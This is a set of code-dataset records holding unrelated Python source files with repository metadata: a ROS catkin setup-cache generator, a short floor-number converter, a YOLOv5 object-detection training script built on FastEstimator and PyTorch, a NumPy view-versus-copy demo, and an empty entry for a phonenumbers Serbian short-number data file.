] | |
9b2b8d9a504e1ddc561e1f9a302d6c4958662e9b
|
0b751bab8d276d976e18b174e12fb26299b0a0fa
|
/cmake-build-debug/catkin_generated/generate_cached_setup.py
|
b0895402ca4143a9357dbcd96b673750652bc7f4
|
[] |
no_license
|
sukai33/stereo_camera
|
9e8fd7c7175c863f65b87c02ef3dd50ea44f5bc3
|
5d2969c51e73c5b5c0a5b4e1fd4ea39aae54d788
|
refs/heads/master
| 2022-12-31T14:39:38.244507 | 2020-10-24T14:38:07 | 2020-10-24T14:38:07 | 306,902,850 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,382 |
py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in '/home/ty/Workspace/ROS/study_ws/devel;/opt/ros/melodic'.split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/ty/Workspace/ROS/study_ws/src/stereo_camera/cmake-build-debug/devel/env.sh')
output_filename = '/home/ty/Workspace/ROS/study_ws/src/stereo_camera/cmake-build-debug/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
# print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
|
[
"[email protected]"
] | |
d4a4ee646ecfaa2e76630580842bb125b95addd2
|
60044c76b631e622edb28f3a74971ce06211fac5
|
/Python-for-Everybody/Python-Databases/Object-oriented-programming/elev.py
|
d27d8423495563ff000c23f513a2a2f4f8ec03fe
|
[] |
no_license
|
NestorMonroy/Courses-coursera
|
8d45a858c79567d74f013ac27ac33d47e43abb96
|
98ac1aa5bb0cd9da5cea5be02995d5b65c779201
|
refs/heads/master
| 2023-08-14T13:36:07.348994 | 2021-09-22T06:13:57 | 2021-09-22T06:13:57 | 327,753,375 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 99 |
py
|
usf = input('Ingrese el numero de piso US: ')
wf = int(usf)-1
print('Numero de piso NO-US es ', wf)
|
[
"[email protected]"
] | |
efa141f731ede50aa0f398e6fba17b8f070b9ad4
|
57dccf7b8da26753b66a9eecb9eb6cd1ae5584b5
|
/yolov5/yolov5s_torch.py
|
b06dae06a62e27bac031282565d985784eafd144
|
[] |
no_license
|
vbvg2008/benchmarks
|
4b743d6b19a4d0b41fa78b8db2a3f3a3f4e86018
|
29e2e445e6701529e048e8ffa283b5b071295566
|
refs/heads/master
| 2022-12-12T21:50:51.082085 | 2022-12-06T22:09:26 | 2022-12-06T22:09:26 | 187,144,413 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 29,096 |
py
|
import math
import random
import tempfile
import cv2
import numpy as np
import torch
import torch.nn as nn
import torchvision
from albumentations import BboxParams
from torch.utils.data import Dataset
import fastestimator as fe
from fastestimator.dataset.data import mscoco
from fastestimator.op.numpyop import Delete, NumpyOp
from fastestimator.op.numpyop.meta import Sometimes
from fastestimator.op.numpyop.multivariate import CenterCrop, HorizontalFlip, LongestMaxSize, PadIfNeeded
from fastestimator.op.numpyop.univariate import ReadImage, ToArray
from fastestimator.op.tensorop import Average, TensorOp
from fastestimator.op.tensorop.model import ModelOp, UpdateOp
from fastestimator.schedule import EpochScheduler, cosine_decay
from fastestimator.trace.adapt import LRScheduler
from fastestimator.trace.io import BestModelSaver
from fastestimator.trace.metric import MeanAveragePrecision
from fastestimator.util import get_num_devices
# This dataset selects 4 images and its bboxes
class PreMosaicDataset(Dataset):
def __init__(self, mscoco_ds):
self.mscoco_ds = mscoco_ds
def __len__(self):
return len(self.mscoco_ds)
def __getitem__(self, idx):
indices = [idx] + [random.randint(0, len(self) - 1) for _ in range(3)]
samples = [self.mscoco_ds[i] for i in indices]
return {
"image1": samples[0]["image"],
"bbox1": samples[0]["bbox"],
"image2": samples[1]["image"],
"bbox2": samples[1]["bbox"],
"image3": samples[2]["image"],
"bbox3": samples[2]["bbox"],
"image4": samples[3]["image"],
"bbox4": samples[3]["bbox"]
}
class CombineMosaic(NumpyOp):
def forward(self, data, state):
image1, image2, image3, image4, bbox1, bbox2, bbox3, bbox4 = data
images = [image1, image2, image3, image4]
bboxes = [bbox1, bbox2, bbox3, bbox4]
images_new, boxes_new = self._combine_images_boxes(images, bboxes)
return images_new, boxes_new
def _combine_images_boxes(self, images, bboxes):
s = 640
yc, xc = int(random.uniform(320, 960)), int(random.uniform(320, 960))
images_new = np.full((1280, 1280, 3), fill_value=114, dtype=np.uint8)
bboxes_new = []
for idx, (image, bbox) in enumerate(zip(images, bboxes)):
h, w = image.shape[0], image.shape[1]
# place img in img4
if idx == 0: # top left
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif idx == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif idx == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif idx == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
images_new[y1a:y2a, x1a:x2a] = image[y1b:y2b, x1b:x2b]
padw, padh = x1a - x1b, y1a - y1b
for x1, y1, bw, bh, label in bbox:
x1_new = np.clip(x1 + padw, x1a, x2a)
y1_new = np.clip(y1 + padh, y1a, y2a)
x2_new = np.clip(x1 + padw + bw, x1a, x2a)
y2_new = np.clip(y1 + padh + bh, y1a, y2a)
bw_new = x2_new - x1_new
bh_new = y2_new - y1_new
if bw_new * bh_new > 1:
bboxes_new.append((x1_new, y1_new, bw_new, bh_new, label))
return images_new, bboxes_new
class HSVAugment(NumpyOp):
def __init__(self, inputs, outputs, mode="train", hsv_h=0.015, hsv_s=0.7, hsv_v=0.4):
super().__init__(inputs=inputs, outputs=outputs, mode=mode)
self.hsv_h = hsv_h
self.hsv_s = hsv_s
self.hsv_v = hsv_v
def forward(self, data, state):
img = data
r = np.random.uniform(-1, 1, 3) * [self.hsv_h, self.hsv_s, self.hsv_v] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_RGB2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
img = cv2.cvtColor(img_hsv, cv2.COLOR_HSV2RGB)
return img
class CategoryID2ClassID(NumpyOp):
def __init__(self, inputs, outputs, mode=None):
super().__init__(inputs=inputs, outputs=outputs, mode=mode)
missing_category = [66, 68, 69, 71, 12, 45, 83, 26, 29, 30]
category = [x for x in range(1, 91) if not x in missing_category]
self.mapping = {k: v for k, v in zip(category, list(range(80)))}
def forward(self, data, state):
if data.size > 0:
classes = np.array([self.mapping[int(x)] for x in data[:, -1]], dtype="float32")
data[:, -1] = classes
else:
data = np.zeros(shape=(1, 5), dtype="float32")
return data
class GTBox(NumpyOp):
def __init__(self, inputs, outputs, image_size, mode=None):
super().__init__(inputs=inputs, outputs=outputs, mode=mode)
self.image_size = image_size
self.anchor_s = [(10, 13), (16, 30), (33, 23)]
self.anchor_m = [(30, 61), (62, 45), (59, 119)]
self.anchor_l = [(116, 90), (156, 198), (373, 326)]
def forward(self, data, state):
bbox = data[np.sum(data, 1) > 0]
if bbox.size > 0:
gt_sbbox = self._generate_target(data, anchors=self.anchor_s, feature_size=80)
gt_mbbox = self._generate_target(data, anchors=self.anchor_m, feature_size=40)
gt_lbbox = self._generate_target(data, anchors=self.anchor_l, feature_size=20)
else:
gt_sbbox = np.zeros((80, 80, 3, 6), dtype="float32")
gt_mbbox = np.zeros((40, 40, 3, 6), dtype="float32")
gt_lbbox = np.zeros((20, 20, 3, 6), dtype="float32")
return gt_sbbox, gt_mbbox, gt_lbbox
def _generate_target(self, bbox, anchors, feature_size, wh_threshold=4.0):
object_boxes, label = bbox[:, :-1], bbox[:, -1]
gt_bbox = np.zeros((feature_size, feature_size, 3, 6), dtype="float32")
for object_idx, object_box in enumerate(object_boxes):
for anchor_idx, anchor in enumerate(anchors):
ratio = object_box[2:] / np.array(anchor, dtype="float32")
match = np.max(np.maximum(ratio, 1 / ratio)) < wh_threshold
if match:
center_feature_map = (object_box[:2] + object_box[2:] / 2) / self.image_size * feature_size
candidate_coords = self._get_candidate_coords(center_feature_map, feature_size)
for xc, yc in candidate_coords:
gt_bbox[yc, xc, anchor_idx][:4] = object_box # use absoulte x1,y1,w,h
gt_bbox[yc, xc, anchor_idx][4] = 1.0
gt_bbox[yc, xc, anchor_idx][5] = label[object_idx]
return gt_bbox
@staticmethod
def _get_candidate_coords(center_feature_map, feature_size):
xc, yc = center_feature_map
candidate_coords = [(int(xc), int(yc))]
if xc % 1 < 0.5 and xc > 1:
candidate_coords.append((int(xc) - 1, int(yc)))
if xc % 1 >= 0.5 and xc < feature_size - 1:
candidate_coords.append((int(xc) + 1, int(yc)))
if yc % 1 < 0.5 and yc > 1:
candidate_coords.append((int(xc), int(yc) - 1))
if yc % 1 >= 0.5 and yc < feature_size - 1:
candidate_coords.append((int(xc), int(yc) + 1))
return candidate_coords
# Reuseable convolution
class ConvBlock(nn.Module):
def __init__(self, c1, c2, k=1, s=1): # ch_in, ch_out, kernel, stride
super().__init__()
self.conv = nn.Conv2d(c1, c2, k, stride=s, padding=k // 2, bias=False)
self.bn = nn.BatchNorm2d(c2, eps=1e-3, momentum=0.03)
self.act = nn.SiLU()
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.act(x)
return x
# Standard bottleneck
class Bottleneck(nn.Module):
def __init__(self, c1, c2, shortcut=True): # ch_in, ch_out, shortcut
super().__init__()
self.cv1 = ConvBlock(c1, c2, 1)
self.cv2 = ConvBlock(c2, c2, 3)
self.add = shortcut and c1 == c2
def forward(self, x):
out = self.cv1(x)
out = self.cv2(out)
if self.add:
out = out + x
return out
# CSP Bottleneck with 3 convolutions
class C3(nn.Module):
def __init__(self, c1, c2, n=1, shortcut=True): # ch_in, ch_out, num_repeat, shortcut
super().__init__()
self.cv1 = ConvBlock(c1, c2 // 2)
self.cv2 = ConvBlock(c1, c2 // 2)
self.m = nn.Sequential(*[Bottleneck(c2 // 2, c2 // 2, shortcut) for _ in range(n)])
self.cv3 = ConvBlock(c2, c2)
def forward(self, x):
out1 = self.cv1(x)
out1 = self.m(out1)
out2 = self.cv2(x)
out = torch.cat([out1, out2], dim=1)
out = self.cv3(out)
return out
# Focus wh information into c-space
class Focus(nn.Module):
def __init__(self, c1, c2, k=1):
super().__init__()
self.conv = ConvBlock(c1 * 4, c2, k)
def forward(self, x):
# x(b,c,w,h) -> y(b,4c,w/2,h/2)
x = torch.cat([x[..., ::2, ::2], x[..., 1::2, ::2], x[..., ::2, 1::2], x[..., 1::2, 1::2]], 1)
x = self.conv(x)
return x
# Spatial pyramid pooling layer used in YOLOv3-SPP
class SPP(nn.Module):
def __init__(self, c1, c2, k=(5, 9, 13)):
super().__init__()
self.cv1 = ConvBlock(c1, c1 // 2, 1, 1)
self.cv2 = ConvBlock(c1 // 2 * (len(k) + 1), c2, 1, 1)
self.m = nn.ModuleList([nn.MaxPool2d(kernel_size=x, stride=1, padding=x // 2) for x in k])
def forward(self, x):
x = self.cv1(x)
x = torch.cat([x] + [m(x) for m in self.m], 1)
x = self.cv2(x)
return x
class YoloV5(nn.Module):
def __init__(self, w, h, c, num_class=80):
super().__init__()
assert w % 32 == 0 and h % 32 == 0, "image width and height must be a multiple of 32"
self.num_class = num_class
self.focus = Focus(c, 32, 3)
self.conv1 = ConvBlock(32, 64, 3, 2)
self.c3_1 = C3(64, 64)
self.conv2 = ConvBlock(64, 128, 3, 2)
self.c3_2 = C3(128, 128, 3)
self.conv3 = ConvBlock(128, 256, 3, 2)
self.c3_3 = C3(256, 256, 3)
self.conv4 = ConvBlock(256, 512, 3, 2)
self.spp = SPP(512, 512)
self.c3_4 = C3(512, 512, shortcut=False)
self.conv5 = ConvBlock(512, 256)
self.up1 = nn.Upsample(size=None, scale_factor=2, mode="nearest")
self.c3_5 = C3(512, 256, shortcut=False)
self.up2 = nn.Upsample(size=None, scale_factor=2, mode="nearest")
self.conv6 = ConvBlock(256, 128)
self.c3_6 = C3(256, 128, shortcut=False)
self.conv7 = ConvBlock(128, 128, 3, 2)
self.c3_7 = C3(256, 256, shortcut=False)
self.conv8 = ConvBlock(256, 256, 3, 2)
self.c3_8 = C3(512, 512, shortcut=False)
self.conv17 = nn.Conv2d(128, (num_class + 5) * 3, 1)
self.conv20 = nn.Conv2d(256, (num_class + 5) * 3, 1)
self.conv23 = nn.Conv2d(512, (num_class + 5) * 3, 1)
self.stride = torch.tensor([8, 16, 32])
self._initialize_detect_bias()
def _initialize_detect_bias(self):
for layer, stride in zip([self.conv17, self.conv20, self.conv23], self.stride):
b = layer.bias.view(3, -1) # conv.bias(255) to (3,85)
b.data[:, 4] += math.log(8 / (640 / stride)**2) # obj (8 objects per 640 image)
b.data[:, 5:] += math.log(0.6 / (self.num_class - 0.99)) # cls
layer.bias = torch.nn.Parameter(b.view(-1), requires_grad=True)
def forward(self, x):
x = self.focus(x)
x = self.conv1(x)
x = self.c3_1(x)
x = self.conv2(x)
x_4 = self.c3_2(x)
x = self.conv3(x_4)
x_6 = self.c3_3(x)
x = self.conv4(x_6)
x = self.spp(x)
x = self.c3_4(x)
x_10 = self.conv5(x)
x = self.up1(x_10)
x = torch.cat([x, x_6], dim=1)
x = self.c3_5(x)
x_14 = self.conv6(x)
x = self.up2(x_14)
x = torch.cat([x, x_4], dim=1)
x_17 = self.c3_6(x)
x = self.conv7(x_17)
x = torch.cat([x, x_14], dim=1)
x_20 = self.c3_7(x)
x = self.conv8(x_20)
x = torch.cat([x, x_10], dim=1)
x_23 = self.c3_8(x)
out_17 = self.conv17(x_17) # B, 255, h/8, w/8 - P3 stage
out_20 = self.conv20(x_20) # B, 255, h/16, w/16 - P4 stage
out_23 = self.conv23(x_23) # B, 255, h/32, w/32 - P5 stage
out = [out_17, out_20, out_23]
for i, x in enumerate(out):
bs, _, ny, nx = x.shape # x(bs,255,20,20) to x(bs,20,20,3,85)
out[i] = x.view(bs, 3, self.num_class + 5, ny, nx).permute(0, 3, 4, 1, 2).contiguous()
return out
class RescaleTranspose(TensorOp):
def forward(self, data, state):
data = data.permute(0, 3, 1, 2) / 255
return data
class DecodePred(TensorOp):
def __init__(self, inputs, outputs, mode=None):
super().__init__(inputs=inputs, outputs=outputs, mode=mode)
self.strides = [8, 16, 32]
self.num_anchor = 3
self.width, self.height = 640, 640
anchor_s = [(10, 13), (16, 30), (33, 23)]
anchor_m = [(30, 61), (62, 45), (59, 119)]
anchor_l = [(116, 90), (156, 198), (373, 326)]
self.anchors = self.create_anchor(anchor_s, anchor_m, anchor_l, self.strides)
self.grids = self.create_grid(self.strides, self.num_anchor)
def build(self, framework, device):
self.anchors = [anchor.to(device) for anchor in self.anchors]
self.grids = [grid.to(device) for grid in self.grids]
def create_grid(self, strides, num_anchor):
grids = []
for stride in strides:
x_coor = [stride * i for i in range(self.width // stride)]
y_coor = [stride * i for i in range(self.height // stride)]
xx, yy = np.meshgrid(x_coor, y_coor)
xx, yy = np.float32(xx), np.float32(yy)
xx, yy = np.stack([xx] * num_anchor, axis=-1), np.stack([yy] * num_anchor, axis=-1)
grids.append(torch.Tensor(np.stack([xx, yy], axis=-1)))
return grids
def create_anchor(self, anchor_s, anchor_m, anchor_l, strides):
anchors = []
for anchor, stride in zip([anchor_s, anchor_m, anchor_l], strides):
feature_size_x, feature_size_y = self.width // stride, self.height // stride
anchor = np.array(anchor, dtype="float32").reshape((1, 1, 3, 2))
anchor = np.tile(anchor, [feature_size_y, feature_size_x, 1, 1])
anchors.append(torch.Tensor(anchor))
return anchors
def forward(self, data, state):
conv_sbbox = self.decode(data[0], self.grids[0], self.anchors[0], self.strides[0])
conv_mbbox = self.decode(data[1], self.grids[1], self.anchors[1], self.strides[1])
conv_lbbox = self.decode(data[2], self.grids[2], self.anchors[2], self.strides[2])
return conv_sbbox, conv_mbbox, conv_lbbox
def decode(self, conv_bbox, grid, anchor, stride):
batch_size = conv_bbox.size(0)
grid, anchor = torch.unsqueeze(grid, 0), torch.unsqueeze(anchor, 0)
grid, anchor = grid.repeat(batch_size, 1, 1, 1, 1), anchor.repeat(batch_size, 1, 1, 1, 1)
bbox_pred, conf_pred, cls_pred = torch.sigmoid(conv_bbox[..., 0:4]), conv_bbox[..., 4:5], conv_bbox[..., 5:]
xcyc_pred, wh_pred = bbox_pred[..., 0:2], bbox_pred[..., 2:4]
xcyc_pred = (xcyc_pred * 2 - 0.5) * stride + grid
wh_pred = (wh_pred * 2)**2 * anchor
x1y1_pred = xcyc_pred - wh_pred / 2
result = torch.cat([x1y1_pred, wh_pred, conf_pred, cls_pred], dim=-1)
return result
class ComputeLoss(TensorOp):
def __init__(self, inputs, outputs, img_size=640, mode=None):
super().__init__(inputs=inputs, outputs=outputs, mode=mode)
self.BCEcls = nn.BCEWithLogitsLoss(reduction="none")
self.BCEobj = nn.BCEWithLogitsLoss(reduction="none")
self.img_size = img_size
def forward(self, data, state):
pred, true = data
true_box, true_obj, true_class = torch.split(true, (4, 1, true.size(-1) - 5), dim=-1)
pred_box, pred_obj, pred_class = torch.split(pred, (4, 1, pred.size(-1) - 5), dim=-1)
num_classes = pred_class.size(-1)
true_class = torch.squeeze(torch.nn.functional.one_hot(true_class.long(), num_classes), -2).half()
box_scale = 2 - 1.0 * true_box[..., 2:3] * true_box[..., 3:4] / (self.img_size**2)
iou = torch.unsqueeze(self.bbox_iou(pred_box, true_box, giou=True), -1)
iou_loss = (1 - iou) * true_obj * box_scale
conf_loss = self.BCEobj(pred_obj, true_obj)
class_loss = true_obj * self.BCEcls(pred_class, true_class)
iou_loss = torch.mean(torch.sum(iou_loss, (1, 2, 3, 4)))
conf_loss = torch.mean(torch.sum(conf_loss, (1, 2, 3, 4)))
class_loss = torch.mean(torch.sum(class_loss, (1, 2, 3, 4)))
return iou_loss, conf_loss, class_loss
@staticmethod
def bbox_iou(bbox1, bbox2, giou=False, diou=False, ciou=False, epsilon=1e-7):
b1x1, b1x2, b1y1, b1y2 = bbox1[..., 0], bbox1[..., 0] + bbox1[..., 2], bbox1[..., 1], bbox1[..., 1] + bbox1[..., 3]
b2x1, b2x2, b2y1, b2y2 = bbox2[..., 0], bbox2[..., 0] + bbox2[..., 2], bbox2[..., 1], bbox2[..., 1] + bbox2[..., 3]
# intersection area
inter = (torch.min(b1x2, b2x2) - torch.max(b1x1, b2x1)).clamp(0) * \
(torch.min(b1y2, b2y2) - torch.max(b1y1, b2y1)).clamp(0)
# union area
w1, h1 = b1x2 - b1x1 + epsilon, b1y2 - b1y1 + epsilon
w2, h2 = b2x2 - b2x1 + epsilon, b2y2 - b2y1 + epsilon
union = w1 * h1 + w2 * h2 - inter + epsilon
# iou
iou = inter / union
if giou or diou or ciou:
cw = torch.max(b1x2, b2x2) - torch.min(b1x1, b2x1) # convex (smallest enclosing box) width
ch = torch.max(b1y2, b2y2) - torch.min(b1y1, b2y1) # convex height
if ciou or diou: # Distance or Complete IoU https://arxiv.org/abs/1911.08287v1
c2 = cw**2 + ch**2 + epsilon # convex diagonal squared
rho2 = ((b2x1 + b2x2 - b1x1 - b1x2)**2 + (b2y1 + b2y2 - b1y1 - b1y2)**2) / 4 # center distance squared
if diou:
return iou - rho2 / c2 # DIoU
elif ciou: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47
v = (4 / math.pi**2) * torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2)
with torch.no_grad():
alpha = v / (v - iou + (1 + epsilon))
return iou - (rho2 / c2 + v * alpha) # CIoU
else: # GIoU https://arxiv.org/pdf/1902.09630.pdf
c_area = cw * ch + epsilon # convex area
return iou - (c_area - union) / c_area # GIoU
else:
return iou # IoU
class PredictBox(TensorOp):
def __init__(self, inputs, outputs, mode, width, height, max_outputs=500, conf_threshold=0.4):
super().__init__(inputs=inputs, outputs=outputs, mode=mode)
self.width = width
self.height = height
self.max_outputs = max_outputs
self.conf_threshold = conf_threshold
def forward(self, data, state):
conv_sbbox, conv_mbbox, conv_lbbox = data
batch_size = conv_sbbox.shape[0]
final_results = []
for idx in range(batch_size):
pred_s, pred_m, pred_l = conv_sbbox[idx], conv_mbbox[idx], conv_lbbox[idx]
pred_s, pred_m, pred_l = pred_s.view(-1, 85), pred_m.view(-1, 85), pred_l.view(-1, 85)
preds = torch.cat([pred_s, pred_m, pred_l], dim=0)
preds[:, 4] = torch.sigmoid(preds[:, 4]) # convert logits to confidence score
preds = preds[preds[:, 4] > self.conf_threshold] # filter by confidence
selected_boxes_all_classes = torch.zeros(0, 6).to(conv_sbbox.device)
if preds.size(0) > 0:
classes = torch.argmax(preds[:, 5:], dim=-1)
unique_classes = torch.unique(classes)
for clss in unique_classes:
preds_cls = preds[classes == clss]
x1, y1, w, h = preds_cls[:, 0], preds_cls[:, 1], preds_cls[:, 2], preds_cls[:, 3]
x2, y2 = x1 + w, y1 + h
conf_score, label = preds_cls[:, 4], classes[classes == clss]
selected_bboxes = torch.stack([x1, y1, x2, y2, conf_score, label.to(x1.dtype)], dim=-1)
nms_keep = torchvision.ops.nms(selected_bboxes[:, :4], selected_bboxes[:, 4], iou_threshold=0.35)
selected_bboxes = selected_bboxes[nms_keep]
selected_boxes_all_classes = torch.cat([selected_boxes_all_classes, selected_bboxes], dim=0)
# clamp values:
x1_abs = selected_boxes_all_classes[:, 0].clamp(0, self.width)
y1_abs = selected_boxes_all_classes[:, 1].clamp(0, self.height)
width_abs = torch.min((selected_boxes_all_classes[:, 2] - x1_abs).clamp(0), self.width - x1_abs)
height_abs = torch.min((selected_boxes_all_classes[:, 3] - y1_abs).clamp(0), self.height - y1_abs)
labels_score, labels = selected_boxes_all_classes[:, 4], selected_boxes_all_classes[:, 5]
results_single = [x1_abs, y1_abs, width_abs, height_abs, labels, labels_score, torch.ones_like(x1_abs)]
results_single = torch.stack(results_single, dim=-1)
# pad 0 to other rows to improve performance
results_single = torch.nn.functional.pad(results_single,
(0, 0, 0, self.max_outputs - results_single.size(0)))
final_results.append(results_single)
final_results = torch.stack(final_results)
return final_results
def lr_schedule_warmup(step, train_steps_epoch, init_lr):
warmup_steps = train_steps_epoch * 3
if step < warmup_steps:
lr = init_lr / warmup_steps * step
else:
lr = init_lr
return lr
def get_estimator(data_dir,
model_dir=tempfile.mkdtemp(),
epochs=200,
batch_size_per_gpu=32,
max_train_steps_per_epoch=None,
max_eval_steps_per_epoch=None):
num_device = get_num_devices()
train_ds, val_ds = mscoco.load_data(root_dir=data_dir)
train_ds = PreMosaicDataset(mscoco_ds=train_ds)
batch_size = num_device * batch_size_per_gpu
pipeline = fe.Pipeline(
train_data=train_ds,
eval_data=val_ds,
batch_size=batch_size,
ops=[
ReadImage(inputs=("image1", "image2", "image3", "image4"),
outputs=("image1", "image2", "image3", "image4"),
mode="train"),
ReadImage(inputs="image", outputs="image", mode="eval"),
LongestMaxSize(max_size=640,
image_in="image1",
bbox_in="bbox1",
bbox_params=BboxParams("coco", min_area=1.0),
mode="train"),
LongestMaxSize(max_size=640,
image_in="image2",
bbox_in="bbox2",
bbox_params=BboxParams("coco", min_area=1.0),
mode="train"),
LongestMaxSize(max_size=640,
image_in="image3",
bbox_in="bbox3",
bbox_params=BboxParams("coco", min_area=1.0),
mode="train"),
LongestMaxSize(max_size=640,
image_in="image4",
bbox_in="bbox4",
bbox_params=BboxParams("coco", min_area=1.0),
mode="train"),
LongestMaxSize(max_size=640,
image_in="image",
bbox_in="bbox",
bbox_params=BboxParams("coco", min_area=1.0),
mode="eval"),
PadIfNeeded(min_height=640,
min_width=640,
image_in="image",
bbox_in="bbox",
bbox_params=BboxParams("coco", min_area=1.0),
mode="eval",
border_mode=cv2.BORDER_CONSTANT,
value=(114, 114, 114)),
CombineMosaic(inputs=("image1", "image2", "image3", "image4", "bbox1", "bbox2", "bbox3", "bbox4"),
outputs=("image", "bbox"),
mode="train"),
CenterCrop(height=640,
width=640,
image_in="image",
bbox_in="bbox",
bbox_params=BboxParams("coco", min_area=1.0),
mode="train"),
Sometimes(
HorizontalFlip(image_in="image",
bbox_in="bbox",
bbox_params=BboxParams("coco", min_area=1.0),
mode="train")),
HSVAugment(inputs="image", outputs="image", mode="train"),
ToArray(inputs="bbox", outputs="bbox", dtype="float32"),
CategoryID2ClassID(inputs="bbox", outputs="bbox"),
GTBox(inputs="bbox", outputs=("gt_sbbox", "gt_mbbox", "gt_lbbox"), image_size=640),
Delete(keys=("image1", "image2", "image3", "image4", "bbox1", "bbox2", "bbox3", "bbox4", "bbox"),
mode="train"),
Delete(keys="image_id", mode="eval")
],
pad_value=0)
init_lr = 1e-2 / 64 * batch_size
model = fe.build(
lambda: YoloV5(w=640, h=640, c=3),
optimizer_fn=lambda x: torch.optim.SGD(x, lr=init_lr, momentum=0.937, weight_decay=0.0005, nesterov=True),
mixed_precision=True)
network = fe.Network(ops=[
RescaleTranspose(inputs="image", outputs="image"),
ModelOp(model=model, inputs="image", outputs=("pred_s", "pred_m", "pred_l")),
DecodePred(inputs=("pred_s", "pred_m", "pred_l"), outputs=("pred_s", "pred_m", "pred_l")),
ComputeLoss(inputs=("pred_s", "gt_sbbox"), outputs=("sbbox_loss", "sconf_loss", "scls_loss")),
ComputeLoss(inputs=("pred_m", "gt_mbbox"), outputs=("mbbox_loss", "mconf_loss", "mcls_loss")),
ComputeLoss(inputs=("pred_l", "gt_lbbox"), outputs=("lbbox_loss", "lconf_loss", "lcls_loss")),
Average(inputs=("sbbox_loss", "mbbox_loss", "lbbox_loss"), outputs="bbox_loss"),
Average(inputs=("sconf_loss", "mconf_loss", "lconf_loss"), outputs="conf_loss"),
Average(inputs=("scls_loss", "mcls_loss", "lcls_loss"), outputs="cls_loss"),
Average(inputs=("bbox_loss", "conf_loss", "cls_loss"), outputs="total_loss"),
PredictBox(width=640, height=640, inputs=("pred_s", "pred_m", "pred_l"), outputs="box_pred", mode="eval"),
UpdateOp(model=model, loss_name="total_loss")
])
traces = [
MeanAveragePrecision(num_classes=80, true_key='bbox', pred_key='box_pred', mode="eval"),
BestModelSaver(model=model, save_dir=model_dir, metric='mAP', save_best_mode="max")
]
lr_schedule = {
1:
LRScheduler(
model=model,
lr_fn=lambda step: lr_schedule_warmup(
step, train_steps_epoch=np.ceil(len(train_ds) / batch_size), init_lr=init_lr)),
4:
LRScheduler(
model=model,
lr_fn=lambda epoch: cosine_decay(
epoch, cycle_length=epochs - 3, init_lr=init_lr, min_lr=init_lr / 100, start=4))
}
traces.append(EpochScheduler(lr_schedule))
estimator = fe.Estimator(pipeline=pipeline,
network=network,
epochs=epochs,
traces=traces,
monitor_names=["bbox_loss", "conf_loss", "cls_loss"],
max_train_steps_per_epoch=max_train_steps_per_epoch,
max_eval_steps_per_epoch=max_eval_steps_per_epoch)
return estimator
|
[
"[email protected]"
] | |
6ced28b132958d66dd3e4dfcf2043949abc92e14
|
84f3814b595dd362188d8c3b8ba54f80031655a0
|
/tangyudi/base/numpy/numpy_4.py
|
25a2b556c6fc21f7b56e50277d00d9a482cdd965
|
[] |
no_license
|
qisionline/py_stu
|
56f1698aad1bc104e260e7d54f55b84aee193813
|
5bafb6296a1f583df2b43defc3061f7093079ab6
|
refs/heads/master
| 2023-06-20T00:06:22.793170 | 2021-07-05T07:06:24 | 2021-07-05T07:06:24 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 264 |
py
|
import numpy as np
a=np.arange(12)
b=a
print(b is a)
b.shape=3,4
print(a.shape)
print(a)
print(b)
print(id(a))
print(id(b))
c=a.view()
print(c)
a.shape=2,6
print(a)
a[0,4]=55
print(a)
print(c)
print(c is a)
d=a.copy()
print(d is a)
d[0,0]=9999
print(d)
print(a)
|
[
"[email protected]"
] | |
4ce8f9853c6437d81e11aaaef635f53fd238a39b
|
e4713c248c857b06a3cb0e9d0d15dd5513b1a8e9
|
/phonenumbers/shortdata/region_RS.py
|
4348b933951308ad6b2bb7bba8514682199003a3
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
igushev/fase_lib
|
8f081e0f6b956b186dc759906b21dc3fc449f045
|
182c626193193b196041b18b9974b5b2cbf15c67
|
refs/heads/master
| 2023-05-14T14:35:05.727202 | 2022-04-15T23:55:37 | 2022-04-15T23:55:37 | 107,228,694 | 10 | 0 |
MIT
| 2023-05-01T19:38:09 | 2017-10-17T06:47:07 |
Python
|
UTF-8
|
Python
| false | false | 710 |
py
|
